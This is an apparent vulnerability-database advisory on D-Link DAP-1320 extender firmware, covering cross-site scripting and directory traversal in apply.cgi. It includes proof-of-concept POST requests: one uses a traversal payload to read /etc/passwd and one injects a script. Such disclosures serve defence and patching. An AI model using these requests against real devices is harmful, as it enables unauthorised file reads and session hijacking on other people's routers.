ID
VAR-201405-0650
TITLE
D-Link DAP-1320 'html_response_message' Cross-Site Scripting Vulnerability
Trust: 0.6
DESCRIPTION
The D-Link DAP-1320 is a router device. D-Link DAP-1320 'html_response_message' has a cross-site scripting vulnerability. The GET parameter passed to the apply.cgi via the \"html_response_page\" GET parameter is missing filtering before returning to the user, allowing remote attackers to exploit the vulnerability to construct a malicious URI to entice the user. Parsing, get sensitive cookies, hijack sessions or perform malicious actions on the client. D-Link's DAP-1320 Wireless Range Extender suffers from both a directory traversal and a XSS vulnerability on all firmware versions. (current v. 1.20B07) --------------------------------------------------------------------------------------------------------------------- Directory Traversal CWE-22: Path Traversal The POST param 'html_response_page' of apply.cgi suffers from a directory traversal vulnerability. The following example will display the contents of /etc/passwd: http://<IP>/apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=PAN&tmp_log_pass_auth=FRIED&graph_code=0DEY&session_id=57687&gcode_base64=8TEHPOO%3D HTTP/1.1 --------------------------------------------------------------------------------------------------------------------- XSS CWE-79: Cross Site Scripting The POST param 'html_response_page' of apply.cgi suffers from a XSS vulnerability. Example: http://<IP>/apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded POST html_response_page=%3Cscript%3Ealert%28"SquirrelLord"%29%3B%3C%2Fscript%3E&login_name=Huggy&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=pop&tmp_log_pass_auth=goes&graph_code=joffrey&session_id=57687&gcode_base64=ZZTOPI%3D HTTP/1.1 --------------------------------------------------------------------------------------------------------------------- Vendor Link: http://support.dlink.com/ProductInfo.aspx?m=DAP-1320 Research Contact: K Lovett
Trust: 0.63
IOT TAXONOMY
| category: | ['IoT', 'Network device'] | sub_category: | - | Trust: 0.6 |
AFFECTED PRODUCTS
| vendor: | d link | model: | dap-1320 | scope: | - | version: | - | Trust: 0.6 |
CVSS
SEVERITY | CVSSV2 | CVSSV3 | ||||||||||||||||||||||||||||||||||||||||||
|
|
TYPE
xss, file inclusion
Trust: 0.1
PATCH
| title: | D-Link DAP-1320 'html_response_message' patch for cross-site scripting vulnerability | url: | https://www.cnvd.org.cn/patchinfo/show/45533 | Trust: 0.6 |
EXTERNAL IDS
| db: | PACKETSTORM | id: | 126219 | Trust: 0.7 |
| db: | CNVD | id: | CNVD-2014-02961 | Trust: 0.6 |
REFERENCES
| url: | http://packetstormsecurity.com/files/126219/d-link-dap-1320-directory-traver | Trust: 0.6 |
| url: | http://<ip>/apply.cgi | Trust: 0.1 |
| url: | http://support.dlink.com/productinfo.aspx?m=dap-1320 | Trust: 0.1 |
CREDITS
Kyle Lovett
Trust: 0.1
SOURCES
| db: | CNVD | id: | CNVD-2014-02961 |
| db: | PACKETSTORM | id: | 126219 |
LAST UPDATE DATE
2022-05-17T02:09:49.705000+00:00
SOURCES UPDATE DATE
| db: | CNVD | id: | CNVD-2014-02961 | date: | 2014-05-13T00:00:00 |
SOURCES RELEASE DATE
| db: | CNVD | id: | CNVD-2014-02961 | date: | 2014-05-13T00:00:00 |
| db: | PACKETSTORM | id: | 126219 | date: | 2014-04-17T22:23:03 |